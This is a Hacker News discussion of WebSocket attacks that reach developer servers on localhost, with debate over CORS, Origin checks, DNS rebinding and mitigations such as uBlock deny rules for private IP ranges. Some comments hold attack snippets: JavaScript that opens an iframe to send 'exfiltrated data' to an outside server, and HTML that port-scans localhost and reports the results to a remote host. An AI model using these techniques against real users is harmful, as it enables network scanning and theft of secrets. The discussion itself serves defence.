Hacker News new | past | comments | ask | show | jobs | submit login
Stealing secrets from developers using WebSockets (medium.com/stestagg)
513 points by _gok2 on May 21, 2020 | hide | past | favorite | 137 comments



"In all seriousness, this attack vector is pretty slim. You’ve got to tempt unwitting users to visit your site, and to stay on it while they’re developing JS code."

Wrap the exploit up in a blog post about Rust -- or an article about gut bacteria -- and submit it to Hackernews. Boom, a virtual feast of secrets.


Or even better wrap it in a blog post titled: Stealing secrets from developers using WebSockets


Exactly. I've got a blog with dozens of technical documents about JS and other topics. That would be an ideal place to harvest this type of information, from developers actively looking for a solution to a particular problem.


So the blog should have articles on how to set up and log into Service X using React! This explains why I see so many of these!


The average post quality on Proggit has gone down a lot in the last year. It would be funny if this were why.


Or shotgun it out to the web over a compromised ad network, as has been done with other attacks


Another idea: an online json editor


Are these not already phishing sites of some kind?

I used to have some co-workers who would dump json docs containing sensitive information into these sites all the time, and despite showing them how to format stuff in VS Code.


Wouldn't be hard to adapt this to be literally one of your VS Code extensions.

https://github.com/microsoft/vscode-extension-samples/blob/m...


How many people post on here about having hundreds of tabs open?


Exactly what I was going to post. At any given time it's about 80% likely SO is going to be open in at least one of my chrome tabs.


"Gut bacteria influence proficiency at Rust programming."

Could that be the highest voted link in HN history?



What is stopping facebook, Reddit, or another popular site you have open while you're developing add this kind of thing and get user info? Or am I misunderstanding something?


Theoretically nothing but it'd probably be a PR disaster even for a site like Facebook if people found out it was trying to steal their passwords. (Is that even legal?)


Would it? They do this sort of thing constantly. Recently Facebook was accused of trying to acquire a malware company to get at user data after iOS security restrictions became tighter. They were also accessing people’s email accounts after requiring their email passwords for login to facebook


Technically, you only get legal issues if you do anything bad with the stolen passwords, but it'd totally be a PR disaster so they wouldn't do it anyways.


Since passwords are GDPR protected data, just saving them (and not using them) without consent is at least a breach of GDPR and illegal in most EU member states.


This is only so if the complaint I always see here that people don't read the articles is false though.


well that very same attack vector aka "visiting a web site" is what everyone had against Flash

how convenient to consider that "pretty slim" now


Why would anyone trust that Facebook isn’t already doing things like this?


This is why you don't let @wongmjane inject code into websites. Imagine what features she'd learn about with tracebacks from developer machines! /s

In seriousness, this is all because websockets aren't bound by CORS, for good reason. https://blog.securityevaluators.com/websockets-not-bound-by-...

There's a simple fix though - hot reload websocket listeners like Webpack should only consider the connection valid if they first receive a shared secret that's loaded into the initial dev bundle, which itself would never be transmitted over a websocket and could be set via CORS to not be accessible to non-whitelisted origins. It's a dead-simple protocol with no ongoing performance impacts. But understandable it hasn't been implemented yet.


> In seriousness, this is all because websockets aren't bound by CORS, for good reason. https://blog.securityevaluators.com/websockets-not-bound-by-...

As far as I can tell, that article only explains that WebSockets aren't bound by CORS. It doesn't provide a reason (good or otherwise) why WebSockets were designed that way. Personally, I consider that feature to be a design flaw. If WebSockets handshakes respected the Same-Origin-Policy and CORS headers the same way every other HTTP request on the web does, none of these vulnerabilities with poorly implemented WebSockets servers would exist today, as they would be secure by default rather than "insecure unless the server properly validates the origin header on every handshake".

Probably too late to do anything about that anymore though. Changing WebSockets to respect the Same Origin Policy now would break a ton of websites.


It's a function of the natural evolution of things.

The same origin policy was originally introduced with AJAX at a time when the vast majority of traffic was to the same origin. It wasn't a common pattern to make complex requests to a different domain (barring GETs and FORM posts which were allowed).

Web development changed and it started to become more popular to make complex cross-domain requests, but the problem is they couldn't just throw out the SOP without introducing a massive security vulnerability to all existing sites. So instead CORS was introduced as an option to relax the SOP.

With websockets being completely different, it was an opportunity to "start over". They opted to embrace cross-domain communication and require developers implement security on top of it.

The `postMessage` API has done the same thing. Any window can `postMessage` to any other window -- it's fully up to the windows to validate the security of messages coming their way.

Some argue that it's a bad idea to make "allow by default" the new paradigm. Personally, it seems pretty clear to me that developers just don't understand CORS at all [0], and letting the developers handle this in their own logic, while being exceptionally clear about this in the documentation, is a far more developer friendly and simple (therefore more secure) approach.

[0]: https://fosterelli.co/developers-dont-understand-cors


Developers not understanding CORS is simply all the more reason why it's good that CORS defaults to secure behavior whenever possible. The harder you make it for ignorant developers to shoot themselves (and their users) in the foot, the better.

postMessage's API design has similar issues to WebSockets. MDN does a pretty good job of explaining the dangers (practically every other paragraph on the page for postMessage contains a warning in bold text about properly validating the origin argument), but I think it would have been far better if the API forced devs to explicitly specify which origins they want to receive events from up front rather than relying on them to check the origin themselves after the message is received. I have little doubt there will be numerous vulnerabilities instigated by the current API design, despite MDN's warnings.


> Developers not understanding CORS is simply all the more reason why it's good that CORS defaults to secure behavior whenever possible. The harder you make it for ignorant developers to shoot themselves (and their users) in the foot, the better.

Right, but not understanding something doesn't mean it is more difficult to shoot yourself in the foot -- in fact it's the opposite. The zoom vulnerability is an example of this, or every developer that just imports `cors()` middleware and runs it because "otherwise it gives some CORS error".

I'd rather an approach that is simple to understand, gives flexibility to the developers, and makes it crystal clear to them what their responsibilities are.


I'm not trying to saying that CORS is harder to shoot yourself in the foot with because it's hard to understand. Rather, it's harder to shoot yourself in the foot with because not understanding it usually just means your site's pages aren't accessible to other origins at all. (That's one reason why so many developers seem to have so much trouble with it; rather than breaking their site's security and remaining completely unaware of it, they instead break their site's functionality instead and need to spend a bunch of "extra" time learning about CORS and the same origin policy before they can get it to work.)

In contrast, not understanding WebSockets usually means your WebSocket endpoints are completely insecure, with no indication that anything is wrong and no incentive to learn more because "it's already working".

Obviously secure-by-default is not completely foolproof. After all, defaults are, by definition, possible to change. But if developers are going to shoot themselves in the foot, I'd much rather them be forced to do so explicitly than have it happen to them implicitly without any action on their part.


I see what you're saying and agree with the fundamentals. I think we disagree on this assumption:

> they instead break their site's functionality and need to spend a bunch of "extra" time learning about CORS and the same origin policy before they can get it to work

In my experience, a very large percentage of developers don't do this. They try that, then find it confusing, and they only estimated two days for this task, which is already late, so they just sort out enough to get it to work. For most cases, this is importing `cors()` and passing it in as middleware. The easiest config... and also the one that makes your site available to all origins.

At the end of the day it will always come down to developer education. Someone will make something easy to use. So we might as well make it really simple to use and understand, so that it's easier to educate the right way to build things.


The last time I was getting annoyed with CORS preventing me from doing something, I wrote a VBA script that opened IE, loaded a random page from the site that was clashing, and injected javascript to do what I wanted.

...and I don't even have admin access to my own computer.


That’s exactly the solution I was thinking of. No end-user visible changes required, just change websocket to require a secret on initial connection. An easy way of doing this might be to use the web socket URL path or a query variable. Note that we’re relying on the websocket library code to do the right thing: https://tools.ietf.org/html/rfc6455#section-10.7

Example, and note: https://news.ycombinator.com/item?id=23261309


Websocket protocol defines Origin header to indicate which website tries to establish connection. Hot reload websocket server must check it and allow localhost connections only (at least by default).


It might not be localhost or a local IP if users use a different hostname, common for some environments, at which point it would have to be configurable. But yes, that could also work, if all browsers send Origin headers as expected.


Oh well. I ended up adding these rules to uBlock Origin, suggestions for improvement welcome:

    ||localhost^$important,third-party
    ||127.*^$important,third-party
    ||10.*^$important,third-party
    ||192.168.*^$important,third-party
    ||172.16.*^$important,third-party
    ||172.17.*^$important,third-party
    ||172.18.*^$important,third-party
    ||172.19.*^$important,third-party
    ||172.20.*^$important,third-party
    ||172.21.*^$important,third-party
    ||172.22.*^$important,third-party
    ||172.23.*^$important,third-party
    ||172.24.*^$important,third-party
    ||172.25.*^$important,third-party
    ||172.26.*^$important,third-party
    ||172.27.*^$important,third-party
    ||172.28.*^$important,third-party
    ||172.29.*^$important,third-party
    ||172.30.*^$important,third-party
    ||172.31.*^$important,third-party


That won’t help if someone sets up public DNS to point to localhost or 127.0.0.1 though. Unless you check after DNS is resolved?

It’s also possible someone might bind to an IPv6 address.

Better to rely on fixes mentioned elsewhere for web socket servers running on the local machine, including inserting a secret key into web socket path or query param, ensuring the web socket validates the path or query, and ensuring there are no web socket endpoints that could be used to get the secret from the websocket when not passed in. (Like an index of paths.) The Node debugger is mentioned elsewhere here as an example and cautionary tale.

Paranoid folks could maybe trick their everyday browser into never connecting to localhost via various means, and there’s an argument that websockets deserve localhost third-party restrictions or prompts, but if I were an attacker, publishing a malicious package via the web is significantly easier and higher value. Also, websockets require JS so disabling JS is another workaround. But then the site could encourage you to enable it for other reasons...


Thanks, I was aware of the DNS rebinding possibility but not sure how to best protect against that. I'm also less worried about websockets and other things that I know are running on my machine, but more about all the other random devices floating around in my network.

What I really want is a way to block (by default) all connections to my local network from websites outside of my network, like a firewall.

It amazes me that browsers just allow this, this should require a permission prompt.


I agree about it being scary that the browser doesn't do more to prevent connections from from "localhost" to "not localhost".

https://github.com/99designs/aws-vault/issues/578 was for an issue with remote servers accessing the localhost ec2 metadata service that aws-vault can run, that worked exactly by using DNS rebinding. It was fixed only a couple weeks ago, so it seems like this is a developing area and if I were on a red team or pen testing, I would play around with more.

I visualize the "localhost hole" problem of blindly trusting localhost as an air gap in a pipe (like [0]); anybody could come along and either drop poison in the pipe, or redirect the water coming from the top to their own bucket, or both.

[0] https://districtsales.ca/wp-content/uploads/2019/07/tru-gap-...


The best way to protect against DNS rebinding attacks is at the DNS server level on your local network.

https://www.nlnetlabs.nl/documentation/unbound/unbound.conf/

the private-address directive and setting cache-min-ttl to a value of higher than 10 minutes or so both do a lot to neuter dns rebinding attacks.

Other DNS Resolvers have similar settings.


The DNS resolver/server is still resolving 127.0.0.0/8 and ::1 with these settings.


Not if you tell it otherwise.


Part of the problem is a number of networks use public IPs including IPv6. NAT isn’t always required. Where it is used though, one could block DNS reflection at the DNS forwarder or locally, and use an application-specific firewall to block connections to local IPs from a particular app. You could use a proxy or custom DNS setting for a browser to blackhole traffic to local addresses but outside of using a proxy they could still use IP addresses. Combined with the earlier solution though that might work for IPv4 NAT environments.

Fact is, internet connected devices need to be secure, and NAT as a security tool has to be stopped, it’s just one really convenient security layer, but is relatively easy to work around, so it’s not inherently secure on its own...

I am also reminded of Internet Explorer Security Zones, where you could define different rules for your local network vs the public internet. And Home vs Work vs Public wifi connections on Windows. These days, though, most users aren’t going to configure their networks to this degree... safer routers are perhaps the only easy way to start, but folks hate getting lots of notifications, so it’s unclear how any general purpose solution would work beyond localhost.



I particularly like the “websites can reject unknown host header” solution as an extra form of protection against this. But we go back to the web socket server needing to inspect the URL and host headers it’s given. Also: https://news.ycombinator.com/item?id=23263983


I have even pointed various webpages to 127.0.0.1

When I do not want the browser to access somedomain.com, I redirect somedomain.com to 127.0.0.1 in my hosts file


Heads up to anyone who doesn't already know, uMatrix[0] can be set up to block websockets by default from 3rd-party and/or first-party domains. In the UI, websockets are grouped under the "xhr" column[1].

I'm a pretty big Javascript advocate, but I do recommend advanced users run uMatrix and consider disabling at least 3rd-party JS by default. uMatrix is a fantastic tool and it really doesn't take long to get used to. And honestly, a relatively large portion of the web works with only 1st party Javascript, and a surprising chunk of the web still works just fine with no Javascript at all.

This is also why I advise advanced users to run Firefox. uMatrix isn't available for Safari, and it's looking extremely likely that it'll be at least underpowered in Chrome once Manifest v3 comes out. Or I guess run Brave or Vivaldi or whatever. Dang kids running around with their hipster browsers, I can't keep track of them all.

The point is, even though I'm extremely bullish on the web as a secure application platform, part of the reason I'm bullish is because the web makes it relatively easy to take simple security measures like disabling scripts by default. You should absolutely take advantage of that, you should absolutely be disabling at least some Javascript features when you browse.

You can even globally turn off fingerprinting vectors like WebGL[2]/Canvas[3] in Firefox, and just swap to a different profile whenever you want to visit the rare game/app that requires them. Although with more and more people trying to embed their own DOM models in Canvas, maybe that'll be harder in the future.

[0]: https://github.com/gorhill/uMatrix

[1]: https://github.com/gorhill/uMatrix/wiki/The-popup-panel#the-...

[2]: about:config -> `webgl.disabled` -> true

[3]: https://bugzilla.mozilla.org/show_bug.cgi?id=967895


I really like uMatrix, but I don't want to spend my time tweaking every page I visit before I can use it, that's why I compromise with uBlock Origin. uMatrix is safer but impractical for most people.

I'd be happier if Firefox itself asked for permission before allowing web servers an websockets, but even this wouldn't be terribly helpful, as any authorized website (like agar.io) could then scan you.


I actually find uBlock superior in that it's easier to blacklist/whitelist specific scripts. E.g. you can more easily blacklist ad scripts while leaving relatively harmless 3rd-party scripts running like jQuery.


> the web makes it relatively easy to take simple security measures like disabling scripts by default

The average user will never learn to configure and use software like uMatrix.


Everything is relative. More users will learn to configure and use software like uMatrix than will ever learn to configure IP tables, firewalls, or SE Linux policies. Doubly so when you factor in other web tools that are much easier to use like uBlock Origin, where disabling Javascript by default is a single option, and enabling it again per-website is a single menu-item click.

Compared to alternative platforms, security on the web is easy.

Also keep in mind the audience. If I was posting this on Facebook or Twitter, I might not make the same recommendations, but uMatrix is not too complicated for the average HN reader to use. It might be annoying and you might decide you don't want to have to turn it off or fiddle with it for some websites, but the learning curve is really not that steep if you have even a rudimentary knowledge about how websites work.


> Also keep in mind the audience.

You were saying you were "bullish on the web". That implies discussing the average user, not the HN crowd.


I'm not going to argue over semantics. I am bullish on the web as a secure application platform for HN readers, and I am bullish on the web as a secure application platform for everyday users.

Of the current platforms available today for ordinary, nontechnical users, the web is currently in the best position on both security and privacy, and it's currently making the best progress in both of those areas as well.

Firefox is pulling up features from Tor, and while right now they're only available to advanced users, more of them will be enabled by default in the future. We've already seen movement from 'advanced' features to 'everyday' features with Firefox starting to inline more of its tracker blocking. Containers are another strong concept that I suspect will get more powerful and more accessible over time. There's some concern over new features (particularly web USB and file access), but we're also seeing a lot of holes get closed around core browser concepts. The changes Chrome is making around SameSite cookies are huge, and both technical and novice users will get them for free without requiring any training or technical knowledge at all.

On the extension front, uBlock Origin isn't as powerful as uMatrix, but it's wildly simple to use; every single computer I set up has it installed, even when I'm setting up computers for kids. That alone is a substantial security and privacy gain over other platforms -- I can't block ads and phishing attacks within my niece's smartphone games, but I can block ads when they're watching Youtube videos. And uBlock Origin is simple enough to install that average users can do so. At this point, there's practically no reason for anyone, anywhere not to be running an adblocker. And when you think about that, it's kind of crazy that in maybe 5 or 6 clicks from a bare-bones browser, any nontechnical user can get better adblocking on the web today than is even possible for an advanced user to set up on a modern smartphone.

So yeah, I'm bullish on the web.

I genuinely don't understand what's controversial about this. Yes, average users probably can't specifically use uMatrix without training. But the web is still the best option available today for those people, even if the only thing they ever do is install uBlock Origin. I'm still advising everyone I know (regardless of their technical know-how) to use apps like Facebook and Twitter inside a browser instead of installing native clients on their phones/tablets/PCs.

Is there another application platform you think is making better progress in this area? What about the web makes you think I shouldn't be bullish about it?


Given the news this has made, I sure hope browser vendors don't overreact with blocking this too hard:

I genuinely have a use-case for this. We have an internal company wide business app, that works in any browser. The usual create-read-update-delete stuff, reports, factory forms etc.

With websockets we solve communication with local devices on the shopfloor - some computers have serial-port attached thermal printers, others have usb attached notification lights. We have small python scripts that listen for commands with websockets on 127.0.0.1 and control the printers and lights.

That way we can control each users local devices from the web app - without configuring internal firewalls or installing special browser add-ons (an in-house browser add-on is a bigger security risk, than a websocket on 127.0.0.1)


Not sure of the best implementation, but couldn't it be behind a permissions dialog like the ones users have to accept for webcam access or notifications?


You can achieve the same with http server as well. You'll just have to setup cors headers.


CMIIW, this is doable without exploiting web socket. Make usual client traffic comes to room "A", then the rest (printer, etc) to room "B". Whatever message comes from "A" is rebroadcasted again to "B".

Unless I misunderstood your use case.

Also, obligatory xkcd 1172


I too like to hardcode my AWS secret keys in my frontend application


Admittedly the example was a bit fake :)

I /have/ put other secrets into frontend code before, strictly for small temporary projects where the cost of implementing secret management outweighs the size of the project. And obviously not in code that was anywhere close to being deployed outside my own box.

Unfortunately the method outlined in the article allows access to environments that would otherwise be considered trusted and not-accessible over the internet, hence the problem


You do realize that your evil server could in fact send something back to your exploit to ask it to send something back to the server it connected to right?

   evil-server
      (looks at data from client)
      (recognizes well known server app)
         (launches exploit!)
The first one that comes to mind is built in "package updaters" where the front end server has a well defined way of updating its packages. Have your evil server send it "get a new version of fetch_user_passwords from here..."


Fake though the example may be, I wouldn’t underestimate its ability to stumble upon something useful if you could garner enough traffic.

- you would probably only need a handful of ports

- it really only takes one person pasting that AWS key into their file to get pwned and I’m sure someone has those keys committed to GitHub right now.

- how many tabs do you have open of random tech blogs right now? Excluding HN, my guess is the average dev has at least one.

Not a super plausible attack, but over a long period of time with decent SEO, could probably deliver some interesting results.


I completely understand friend, have done the very same


Ha! I came here to say this. I also enjoy putting my secrets in post-it notes on my monitor.


I mean if it's a company internal app...


Why the actual fuck will a browser allow traffic to localhost from anywhere else?


Super bad news about that: even if it didn't allow the `localhost` string, DNS rebinding allows the domain name of the site you visited to become 127.0.0.1.

The answer to why browsers allow connections to 127.0.0.1 from external sites is probably something like "legacy reasons".


DNS rebinding can be fixed at the DNS server level. OpenWRT has an option for it. But this websocket thing in browsers can't easily be turned off/mitigated AFAICT.


Well if you are going to use custom software to alter how protocols work, you could just change your web browser.


> DNS rebinding can be fixed at the DNS server level.

Let me know how that works with DNS over HTTP


>DNS rebinding can be fixed at the DNS server level

You can't always depend on that. eg. when you're on public/enterprise wifi that intercepts DNS requests.


This is why a local stub is a very good idea.


Or you can have this on firewall level.


No you can't -- the request from the browser is coming from inside the firewall, on an internal IP.


well, I meant that there are some special firewalls that you can handle dns-rebinding attacks.


exactly!


A better question is why developers, the only group of people likely to understand this security issue, continue to run things on localhost?

Custom hostnames are such a better solution, but for some reason developers don't use them.


In many projects I have worked on in the last 2 decades, one of the first things I find myself needing to do is fix the name services and setup of .local/.home .. To me it really appears that the skill of naming things starts at the the network - to that end, crap-named networks propagate amnesia.


Because the web is supposed to be a web of multiple sites, built my multiple people, sharing a web of resources.

Localhost is just another site. If you want to make it secure, make it secure.

You realize that anybody on your coffeeshop wifi can also connect to your localhost server, don't you? Just because a server is running on your laptop doesn't mean it's not a server, running on the internet.


If you have bound the server to localhost and not all interfaces, then no, people on your coffeeshop wifi cannot connect.


It would be better to say that your laptop is running software on the intranet, not the internet.

Also at least by convention, localhost is only accessible via the loopback interface. This allows it to be accessible even if there is no physical network to connect to, but also means that it is only accessible on the same physical/virtual computer that it is running.

To let other people in the coffee shop access your software you would need to connect to a public or private interface.


Node debug mode runs a websocket, but the address is something like ws://0.0.0.0:9229/1cda98c5-9ae8-4f9a-805a-f36d0a8cdbe8 - without the correct guid at the end, you can't open the websocket and communicate. You can only detect the port being open by timing.


This is true, although until recently it was possible to use DNS rebinding to get the list of guids!

I actually saw people leaving this enabled so much in shipping products, I wrote a little utility to test for it.

https://github.com/taviso/cefdebug


Thanks that's really interesting, as I see from your reports you could call /json/list with rebinding to get the guid. For the past 2 years it now validates the Host header.


And this is why you are supposed to check the origin and host headers before sending sensitive data to a web socket


Yeah, keep pimping these "mitigations" instead of a better security model that doesn't require everyone perfectly jumping through hoops. When you get fucked over by one of such security exploits it will be a great relief to know that it could have been prevented if only the software vendor did the right security voodoo dance (which gets more elaborate by the month).

Edit: can't wait for the usual replies with "what is your solution?"

The obvious flaw in modern web security is that the domain isolation model does not make any sense today. It's an outdated hack. Software communication should be done thorough something resembling actor model where code running locally is thought of as completely separate entity from the web server. It shouldn't have anything to do with domains. Communication from any actor to any other actor should be subject to the same security model, regardless of where their code was loaded from. Escalating privileges between actors should be a universal and well-established process with known guarantees, not a bloody mess of ad-hoc conventions, headers and "best practices" that change with every browser, app and year.


> The obvious flaw in modern web security is that the domain isolation model does not make any sense today. It's an outdated hack. Software communication should be done thorough something resembling actor model where code running locally is thought of as completely separate entity from the web server. It shouldn't have anything to do with domains. Communication from any actor to any other actor should be subject to the same security model, regardless of where their code was loaded from. Escalating privileges between actors should be a universal and well-established process with known guarantees, not a bloody mess of ad-hoc conventions, headers and "best practices" that change with every browser, app and year.

How would that change anything? The flaw is the websocket was open to anyone (on the application layer. All security in the example was due to what ip addressess the websocket binded to on the network layer). If you replace the same origin policy with some other security policy, it wouldn't really make a difference, unless your web socket decided to use it, and in that case you might as well use the existing same origin policy.

If your real argument is that CORS/same origin policy/websocket security policy is inconsistently specified and has made some questionable specification decisions - sure i agree with you. But that has nothing to do with using origin as the security domain for websites

The fundamental flaw here is using the ip address and assumed sufficientness of only binding to 127.0.0.1 as a security measure without application level mitigation, not how browsers do network security

Edit: reflecting on this, i think i change my mind a bit. The fundamental problem isn't that the web security model is full of hacks, but that the websocket spec decided to ignore it and instead focus on the socket (tcp connection) model of secirity. If you open a socket all the server has to authenticate is the ip address. Anyone can open a socket to anywhere, any orher authentication has to be taken from higher level protocol. In websockets, its mostly the same. Anyone can open to anywhere, and webserver just has ip address and origin to authenticate. Anything else should be done in higher level protocol. The problem is people see websocket and assume WEBsocket not webSOCKET.


Its not really a mitigation if its the core security model. A mitigation is a work around. I guess technically a mitigation is anything that fixes the issue, but for example if someone had a password protected app that was hacked because it didnt check the password, i would not call actually checking the password a "mitigation"


Or use cookies, a token in the URL, or any of the existing CSRF mitigation strategies. This is not a new problem. Sensitive and destructive HTTP endpoints open to third-party origins is a bug with many existing solutions.


Implementing any of those require more work. The issue lies in the fact security is an afterthought for the Web.


So much work was put into the design of HTTP and Websockets in particular to avoid so many problems. Like how Websockets were made incapable to talk to any non-websocket TCP endpoint, to avoid exactly this class of attack where your browser would connect to your local SSH, FTP, ... server. There is a built-in Origin validation mechanism, and every websocket connection is going to come with its Origin and Cookies clearly marked. The browser will even disallow cross-origin requests that can modify data (e.g. non-GET) by default. If you go out of your way to build something like Webpack's websocket endpoint and forget to validate anything, it seems a bit dishonest to blame this on "security of the Web".


create-react-app may already be doing so according to https://news.ycombinator.com/item?id=23259803

EDIT: Nope, exploit worked for me against webpack-dev 3.10.3 used by react-scripts 3.4.1


Is anybody keeping a list of potential security threats so browser vendors can check them off and the community can verify that they are correctly dealt with?


I just tested an approach to deny access to WebSockets in the browser. This only applies if the JavaScript and the page comes from a location you both control and your goal is to limit access from third party scripts and you don't have access to the page's server to add a Content Security Policy (CSP) rule restricting web socket addresses/ports to specified rules.

TypeScript code:

    const sock:WebSocketLocal = (function local_socket():WebSocketLocal {
        // A minor security circumvention.
        const socket:WebSocketLocal = <WebSocketLocal>WebSocket;
        WebSocket = null;
        return socket;
    }());
TypeScript definitions (index.d.ts):

    interface WebSocketLocal extends WebSocket {
        new (address:string): WebSocket;
    }
If the 'sock' variable is not globally scoped it cannot be globally accessed. This means third party scripts must know the name of the variable and be able to access the scope where the variable is declared, because the global variable name "WebSockets" is reassigned to null and any attempts to access it will break those third party scripts.


this is trivially defeated by a script that enumerates globals looking for something that extends or implements WebSocket


The `sock` variable wouldn't be global in this case though, so there's nothing to look for.

However there are still so many different ways to defeat this (e.g. creating a web worker, creating a new window that handles the WebSocket and posting messages to it, etc.) that it's basically pointless to try.


If you are opening a new window you are pretty limited. Clearly you are alerting the user that you are spawning new tabs or forcing a new popup if you provide a width or height dimension to your window.open method. Yes, I am aware of the popunder by blurring the new window the moment its created, but that is still not very clever. Even still modern browsers block popups by default, so you have to convince the user to crawl into their browser settings and turn that off, which seems like a hard sell. Then the window.open allows you to specify an address, but not page contents. If you open the same address as the current page the global WebSocket name is still null. You can open to a malicious location though, but that is a good way to get the primary domain blacklisted. You can open to about:blank, which Firefox sends restricted messaging about, but you would have to inject code into that blank page.

Perhaps there are other ways to spawn new windows with greater access control that I am not aware and don't require access to the global window object. The global WebSocket is really window.WebSocket so anything that is reliant upon the window object or inherited from the window object will continue to see that window.WebSocket is null.


The window was just one example (obviously not the most optimal method), there are many other ways you could get around it.

My point is `WebSocket = null` won't stop someone who is already dedicated enough to inject a script onto your site to steal people's webpack hot reload error messages. Really a CSP with `connect-src` is the only way to fully prevent this.

Here's one very simple way to get around your method:

    WebSocket = null
    
    let el = document.createElement("iframe")
    document.body.append(el);
    
    let ws = new el.contentWindow.WebSocket("wss://echo.websocket.org")
    ws.onopen = () => ws.send("my exfiltrated data")


Likewise that is solved for just as trivially by enumerating all globals and replacing any mention of WebSocket with your scoped variable. Of course though if all your code files are ECMA modules the only globals are those provided by the browser and third party scripts.


This websockets thing is getting more interesting very fast. I wonder how long it'll be before someone finds something truly scary? This is the 3rd post this week, and each one has found a little bit more. Nothing that seems panic worthy yet. From this one:

"In all seriousness, this attack vector is pretty slim. You’ve got to tempt unwitting users to visit your site, and to stay on it while they’re developing JS code."


This is one Show HN post away from an exploit in the wild


This issues isn't endemic to websockets. I've done this with iframes as well to portscan machines on my LAN. Additionally, the portscan capabilities are even worse than the article states: you can scan any machine reachable from the visitor's machine. Any 192.* address, anything behind your VPN, so long as the time for actively refusing the connection and failing to route are different. I don't know if you can time connections to known hosts to infer things about Tor circuits.

Simply call Date.now() when adding the iframe and when that iframe's onerror event fires then diff the two. I think you can do this with img tags, frames, and anything backed by a network call that lets you observe load failures.

CORS doesn't save you because you aren't trying to reach into that iframe and run Javascript or access the DOM. A CSP doesn't save you because the site you're visiting is opting to do this and can put whatever they want in their CSP.


POC

https://jsfiddle.net/s9vzxctd/3/

Tested in Firefox ESR on Linux. Anything with about 3000ms time isn't a routable network address. Anything with a significantly longer or shorter time responds to a ping on my network.

Timings vary from browser to browser.

NoScript does block the requests before they ever leave your browser, reminding me why I use it.


NoScript isn't sufficient to protect you from this.

Eg write a simple HTML file like

    <link rel="stylesheet" href="http://127.0.0.1:42">
    ok
If it takes different amounts of time for the page to stop loading and the text to appear depending on the port you checked, you're vulnerable to scans, even when Javascript is disabled.


If the page does not have JS running, how would it check the time elapsed? i'm not seeing the vulnerability with noscript here.


Instead of merely printing 'ok', the page can request a resource from a server you control, eg via an <img> element.

You could probably even automate this via <meta http-equiv="refresh">, along the lines of (untested):

    <meta http-equiv="refresh" content="5; url=http://example.org/?query-port=43">
    <link rel="stylesheet" href="http://127.0.0.1:42">
    <img src="http://example.org/?checked-port=42">


uMatrix can protect against this if you block third party everything by default (which I do).


Exactly. This isn't websockets specific, you can portscan happily with pure JS. The issue is that browsers are allowing connections (from untrusted code) to private/loopback address space. This should really be behind a permission.


> You’ve got to tempt unwitting users to visit your site, and to stay on it while they’re developing JS code

So, something like evil counterparts to HN, reddit, StackOverflow, or latestcatvideos.com.


After reading this post, I checked my browser console on this page, and you'll never guess what I discovered!


I wonder if this could be used to grab more sensitive data from apps that support browser extensions (e.g. from password managers that use websockets to communicate with browser extensions).


You're likely not even safe from this if you are using Chrome OS. It does sandbox the localhost web server [1] [2], but it does not restrict access to it from the host.

[1]: https://youtu.be/pRlh8LX4kQI?t=954

[2]: https://chromium.googlesource.com/chromiumos/platform2/+/HEA...


This is interesting, thanks for sharing. I wonder if a remediation for the moment would be for local websocket servers to check the Host header before sending the 101 switch protocol response. Also would a CORS "Access-Control-Allow-Origin: localhost" prevent the connections being established?


> Also would a CORS "Access-Control-Allow-Origin: localhost" prevent the connections being established?

WebSocket isn't bound by CORS, AFAIK.


It is not subject to CORS, same as any regular img load isn't, but the browser will send an Origin header with websocket handshakes, which you're supposed to check server-side.


Given this is largely talking about sniffing development platforms, it could also require a nonce registered in the app and the frontend and only respond if that's sent via a header.

This would prevent having to worry about people who use other hostnames for host even in localdev.


The Host fix sounds right to me, local TCP web servers already have to do the same thing to avoid DNS rebinding attacks from external websites.


I get the following output when trying this with Create React App running:

{"type":"error","data":"Invalid Host/Origin header"}

I don't think I changed any significant settings in CRA, this is pretty close to the default. Not sure what exactly determines whether this works or not.


Seems to be related to this: https://github.com/webpack/webpack-dev-server/issues/1604

It's not clear (without a lot more digging) what impact the sockjs changes have on this issue.


The server didn't work for me, not sure if it's a traffic issue or what.

I have at least 3 create-react-app and one next app running. I even ran a quick websocket server on port 3000 just to see but nada.


I threw the code together last night. It's running on cloudflare backed by an S3 static file, so shouldn't be capacity issues

It was only tested on Firefox, as a basic proof-of-concept. AIUI, chrome et al offer similar functionality but maybe the API is different

It may also take a few minutes to find and connect to the websocket, I think CRA webserver maybe only binds to one client at a time, so maybe it would pick up the connection after a webpack-dev-server reload or two.


Interesting, history repeats. Didn't browsers implement firewalls a while ago to prevent arbitrary requests? Remember doing things like CSRF attacks on SMTP, POP (any text based protocol basically) and stuff like that long ago, but Firefox added mitigations to prevent connections to certain ports - I guess that browser Firewall feature can be used as mitigation to prevent these attacks.


Forget port scanning for a sec. Couldn't you just scan the whole local network for common vulnerabilities, like any old virus would?


You can only make a websockets request. The javascript call will fail if either the port is closed, or the port is open but doesn't act like a websockets server. So you can tell if a port is open by the time it takes for the connection to fail. If it's actually a websockets server you hit, then you might get a useable bidirectional communication channel to it.


I can still attack your local non-http-servers with a regular <form> post, e.g. something like http://bugs.proftpd.org/show_bug.cgi?id=4143

With Websockets something like this is effectively not possible, because WebSockets were designed with this in mind

- A browser will only start transmitting data over the ws once the handshake is done. So just making a request has very limited ways for an attacker to transmit user defined data (basically the Host header/Origin header and cookies... which will not really work as an attack vector for newline-delimited or binary protocols)

- The handshake itself works by the client sending a nonce to the server which the server then has to hash together with a special uuid. Only actual websocket servers know how to do this step correctly, and thus the browser will refuse to even open connections to servers which aren't actual websocket servers. So the attacker will not be able to send truly arbitrary data or read any responses.

- Even after the handshake, browser-to-server data is masked by XORing the data with browser-picked keys. The attacker therefore cannot control what the data will end up looking like when it is sent to the server. And unaware servers will certainly not try to reverse the XORing.

What you're left with regarding websockets are timing attacks to do some port and network scanning, and attacking actual websocket servers, which do not check the Origin or use some kind of token to verify incoming connections, analog to attack-able regular http endpoints that do not do auth and csrf tokens properly.

I'll readily admit tho, that a lot of developers forget about verifying incoming websocket connections. I have fucked this up myself in the past, and I have found such issues in other websites, including one problem that let me take over user accounts via an unsecured websocket if I was able to get such users to open an attack website (or ad).


> browsers allow websockets from public origins to open websockets connections to localhost without many protections

Excuse me, but what in the world? XHR has all kinds of cross-site request protections that even make developing apps locally a pain. How come websockets don't come with such protections?

Are there apps that take over this responsibility?


It strikes me that this is most likely to be used as part of an exfiltration mechanism for a malicious JS package or similar.


I'm assuming this can be mitigated by using SSL/TLS. Have a read over at https://crossbar.io/docs/Secure-WebSocket-and-HTTPS/ - Not sure how you would do certificate pinning though.


I don't see what WSS would do to stop the local websockets dev server from serving a remote client. A remote client could just accept the connection without verifying the signature, yes?


